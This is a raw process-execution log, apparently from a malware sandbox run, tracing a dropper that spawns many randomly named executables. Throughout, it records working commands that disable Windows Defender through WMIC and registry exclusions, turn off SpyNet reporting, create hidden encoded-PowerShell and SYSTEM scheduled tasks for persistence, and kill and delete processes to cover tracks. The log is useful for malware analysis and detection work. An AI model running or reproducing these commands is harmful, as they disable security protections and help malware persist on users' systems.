C:\Users\Admin\Documents\QnzAFKU5SkZtPhTuIvjXx2N5.exe"C:\Users\Admin\Documents\QnzAFKU5SkZtPhTuIvjXx2N5.exe"6⤵PID:4840
-
-
C:\Users\Admin\Documents\bnHubsT1T2UqBGNcoWBlh3Eo.exe"C:\Users\Admin\Documents\bnHubsT1T2UqBGNcoWBlh3Eo.exe"6⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 5807⤵
- Program crash
PID:7080
-
-
-
C:\Users\Admin\Documents\ks8YoEYOFiKsd6_s4lpiwXFl.exe"C:\Users\Admin\Documents\ks8YoEYOFiKsd6_s4lpiwXFl.exe"6⤵PID:4448
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:892
-
C:\Users\Admin\Documents\f5xnJyFWY7YiUv9e9zaXHXoz.exe"C:\Users\Admin\Documents\f5xnJyFWY7YiUv9e9zaXHXoz.exe"8⤵PID:4284
-
-
C:\Users\Admin\Documents\ljq8bzKswlSaSKrU5KUm5gCo.exe"C:\Users\Admin\Documents\ljq8bzKswlSaSKrU5KUm5gCo.exe"8⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\7zS453.tmp\Install.exe.\Install.exe9⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\7zS4FE3.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:2804
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:932
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:1368
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:1740
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:2844
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:3892
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:3056
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5332
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:6804
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:5184
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:6028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:2796
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:6984
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:3744
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:4700
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:5520
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:6176
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:7100
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:4144
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:5064
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:4300
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnIoPqlmQ" /SC once /ST 02:49:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:6224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnIoPqlmQ"11⤵PID:784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnIoPqlmQ"11⤵PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 05:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\aWIJJiV.exe\" tt /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:4544
-
-
-
-
-
C:\Users\Admin\Documents\JghuflFdMV2hpBfK_VqExnUZ.exe"C:\Users\Admin\Documents\JghuflFdMV2hpBfK_VqExnUZ.exe"8⤵PID:5020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "JghuflFdMV2hpBfK_VqExnUZ.exe" /f & erase "C:\Users\Admin\Documents\JghuflFdMV2hpBfK_VqExnUZ.exe" & exit9⤵PID:2672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "JghuflFdMV2hpBfK_VqExnUZ.exe" /f10⤵
- Kills process with taskkill
PID:3744
-
-
-
-
C:\Users\Admin\Documents\o7BONlV3eWejBMF4Pl8Lx6AU.exe"C:\Users\Admin\Documents\o7BONlV3eWejBMF4Pl8Lx6AU.exe"8⤵PID:4616
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5200
-
-
-
C:\Users\Admin\Documents\yPDYmzqrc9ZlJbD7KTww_Nxb.exe"C:\Users\Admin\Documents\yPDYmzqrc9ZlJbD7KTww_Nxb.exe"6⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\java.exe"C:\Users\Admin\AppData\Local\Temp\java.exe"7⤵PID:6016
-
-
-
C:\Users\Admin\Documents\B7Z12zooZjXZH3tHlNFtXHaZ.exe"C:\Users\Admin\Documents\B7Z12zooZjXZH3tHlNFtXHaZ.exe"6⤵PID:4372
-
-
C:\Users\Admin\Documents\y6eVfqLNdyvrlE6X6KeKnTzu.exe"C:\Users\Admin\Documents\y6eVfqLNdyvrlE6X6KeKnTzu.exe"6⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\7zS338D.tmp\Install.exe.\Install.exe7⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\7zS783B.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵PID:4864
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:3888
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:5196
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:5692
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:4248
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:4180
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:4056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:4780
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:6508
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:3488
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:4688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:4472
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5936
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:2576
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:4588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:5584
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:5060
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:5996
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:5644
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵PID:316
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵PID:5944
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:3016
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵PID:5388
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵PID:3560
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goPnTuagX" /SC once /ST 02:04:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:5696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goPnTuagX"9⤵PID:5472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goPnTuagX"9⤵PID:4732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 05:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\AHDUOqG.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:4668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bOoGaaDxESFbryPOAb"9⤵PID:5236
-
-
-
-
-
C:\Users\Admin\Documents\iUkc9oFRFgEUy5Vlbwj7RY_l.exe"C:\Users\Admin\Documents\iUkc9oFRFgEUy5Vlbwj7RY_l.exe"6⤵PID:4316
-
-
C:\Users\Admin\Documents\VZ9cziqvzSP7sMmrJPfezJJn.exe"C:\Users\Admin\Documents\VZ9cziqvzSP7sMmrJPfezJJn.exe"6⤵PID:4308
-
-
C:\Users\Admin\Documents\JbDN_DA7Z9ekBXNsD9YjJL1F.exe"C:\Users\Admin\Documents\JbDN_DA7Z9ekBXNsD9YjJL1F.exe"6⤵PID:4272
-
-
C:\Users\Admin\Documents\1m2C_eiq1eW_GXsaaZTsw8Yp.exe"C:\Users\Admin\Documents\1m2C_eiq1eW_GXsaaZTsw8Yp.exe"6⤵PID:4264
-
C:\Users\Admin\Documents\1m2C_eiq1eW_GXsaaZTsw8Yp.exe"C:\Users\Admin\Documents\1m2C_eiq1eW_GXsaaZTsw8Yp.exe"7⤵PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 7607⤵
- Program crash
PID:3488
-
-
-
C:\Users\Admin\Documents\HWed7Su524QGM67vH8Ozj_I2.exe"C:\Users\Admin\Documents\HWed7Su524QGM67vH8Ozj_I2.exe"6⤵PID:4256
-
-
C:\Users\Admin\Documents\VubQda3WD0amGU8CgYV8AxQi.exe"C:\Users\Admin\Documents\VubQda3WD0amGU8CgYV8AxQi.exe"6⤵PID:4248
-
-
C:\Users\Admin\Documents\OpTmL5Ma2B9R1ea3C5gIqTy7.exe"C:\Users\Admin\Documents\OpTmL5Ma2B9R1ea3C5gIqTy7.exe"6⤵PID:4240
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵PID:5828
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵PID:5868
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵PID:2216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fee8964f50,0x7fee8964f60,0x7fee8964f708⤵PID:2708
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 4240 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OpTmL5Ma2B9R1ea3C5gIqTy7.exe"7⤵PID:3944
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 42408⤵
- Kills process with taskkill
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 4240 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OpTmL5Ma2B9R1ea3C5gIqTy7.exe"7⤵PID:3160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 42408⤵
- Kills process with taskkill
PID:784
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 21326⤵
- Program crash
PID:4984
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Loads dropped DLL
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1876 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2604
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2764
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵PID:616
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
PID:1756 -
C:\Users\Admin\AppData\Roaming\1742788.scr"C:\Users\Admin\AppData\Roaming\1742788.scr" /S6⤵PID:2068
-
-
C:\Users\Admin\AppData\Roaming\8154894.scr"C:\Users\Admin\AppData\Roaming\8154894.scr" /S6⤵PID:2100
-
-
C:\Users\Admin\AppData\Roaming\8886652.scr"C:\Users\Admin\AppData\Roaming\8886652.scr" /S6⤵PID:2216
-
-
C:\Users\Admin\AppData\Roaming\6408506.scr"C:\Users\Admin\AppData\Roaming\6408506.scr" /S6⤵PID:2248
-
C:\Users\Admin\AppData\Roaming\6408506.scr"C:\Users\Admin\AppData\Roaming\6408506.scr"7⤵PID:2924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 7647⤵
- Program crash
PID:1816
-
-
-
C:\Users\Admin\AppData\Roaming\7811489.scr"C:\Users\Admin\AppData\Roaming\7811489.scr" /S6⤵PID:2348
-
-
C:\Users\Admin\AppData\Roaming\5774527.scr"C:\Users\Admin\AppData\Roaming\5774527.scr" /S6⤵PID:2688
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵PID:2376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun19de8ff4b6aefeb8.exe" & exit6⤵PID:6808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun19de8ff4b6aefeb8.exe" /f7⤵
- Kills process with taskkill
PID:5656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6A11F2\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2116
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2432
-
